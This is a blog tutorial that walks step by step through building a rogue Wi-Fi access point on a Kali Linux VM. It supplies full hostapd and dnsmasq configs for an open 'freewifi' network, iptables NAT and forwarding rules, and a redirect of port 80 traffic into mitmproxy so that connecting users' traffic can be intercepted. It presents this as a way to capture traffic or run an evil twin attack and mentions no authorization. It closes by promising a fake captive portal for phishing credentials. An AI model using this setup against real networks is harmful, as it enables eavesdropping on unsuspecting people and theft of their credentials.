BrainScope

Create a rogue access point with a Linux VM

Published on:

Use a Kali Linux VM to create a fake access point and intercept wifi traffic

André Eichhofer

Good Morning, Today we want to use a Linux Virtual Machine to create a rogue access point. We could use this fake access point to capture potentially unencrypted wifi traffic or to perfrom an evil twin attack. For this setup we will use

  • a Kali Linux VM runnning on Mac OS and a
  • Alfa Network Wifi Adapter.
  • hostapd for the access point
  • dnsmasq for DNS resolution
  • mitmproxy for traffic interception

Create a rogue access point with a Kali Linux VM

First, note the IP Address and the gateway of the Kali VM. Normally, Kali VM gets it internet connection over a virtual bridged adapter from the host system. Use route to check the gateway and the interface.

root@kali: route
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         192.168.0.1     0.0.0.0         UG    100    0        0 eth0      <- Virtual network adapter provider internet access to the VM
172.17.0.0      0.0.0.0         255.255.0.0     U     0      0        0 docker0
192.168.0.0     0.0.0.0         255.255.255.0   U     100    0        0 eth0      <- Local Network

You need to assign a new network to the Access Point that is of course different than the network that provides internet to the VM.

  • Example: Network for internet access for VM: 192.168.0.0
  • Example: Network for Access Point: 192.168.1.0
Alfa Network adapter used to create a rogue access point

Configure wlan interface

After that, plugin the external wifi adapter and check with iwconfig. When plugged in the external wifi adapter is in managed mode.

root@kali: iwconfig
wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=30 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Now, set the wifi adapter into monitor mode:

Kill networkmanager

  • airmon-ng check kill

Set the wifi adapter in monitor mode:

  • ifconfig wlan0 down
  • iwconfig wlan0 mode monitor
  • ifconfig wlan0 up

Alternatively, you can use

  • airmon-ng start <wlan0>

Check that wlan0 interface is in monitor mode:

  • iwconfig
  • ifconfig

Next, check channels of the wifi networks around you. You need to check what channels the other networks around are using. Because you should choose a channel that does not interfere with other APs. Normally, channel 1 or 11 should less interfere with other APs. Use

  • airodump-ng <wlan0>:

to check channels from other APs.

Configure hostapd

Now, you need to configure hostapd to create the access point.

  • Create a directory (e.g. /documents/accesspoint) where you can put hostapd.config and dnsmasq.config locally.
  • Create hostapd.conf within that directory with the following configuration:
interface=wlan0                     # specify interface
driver=nl80211                      
ssid=freewifi                       # name of your network
hw_mode=g
channel=1                           # normally channel 1 / 11
macaddr_acl=0                       # disable mac address filtering
ignore_broadcast_ssid=0             # broadcast ssid
ieee80211n=1
wme_enabled=0                       # set this to 0 if the AP is instable
country_code=AT                     # ensure country code is correct  

# ++++ for WPA 2 use this +++++++
auth_algs=1
wpa=2                              
wpa_passphrase=password1234         # wpa2 passphrase
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400

# ++++ for open use this ++++++++ 
wpa=0

Configure dnsmasq

Finally, you also need to configure dns and dhcp server to assign IP addresses to connected devices: Create dnsmasq.conf within your directory and with the following configuration:

interface=wlan0                   # specify interface
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8                    # use Google nameserver
log-queries
log-dhcp
listen-address=127.0.0.1

Configure network of the access point

Set-up the network of the access point

  • ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
  • route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Enable internet access for the access point: Devices that connect to the access point will get their internet from the existing gateway. To enable IP forwarding, use the following commands:

  • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  • iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
  • iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
  • echo 1 > /proc/sys/net/ipv4/ip_forward

Start the services: Navigate to the directory with the configuration files and start the services

  • hostapd hostapd.conf
  • dnsmasq -C dnsmasq.conf -d

-> In the logs from hostapd and dnsmasq you will see the connections and the DNS resolution of the connected devices.

Route traffic through a proxy server

Finally, when the access point is working you want to route traffic from other devices through a proxy server to intercept non-encrypted traffic.

To capture unencrypted traffic:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
mitmproxy --ssl insecure

Note: You will only see unencrypted traffic coming through mitmproxy. Encrypted traffic will be ignored unless you install an mitmproxy certificate on the host where the traffic is coming from.

In the next post we will see how to create a fake captive portal to phish user credentials.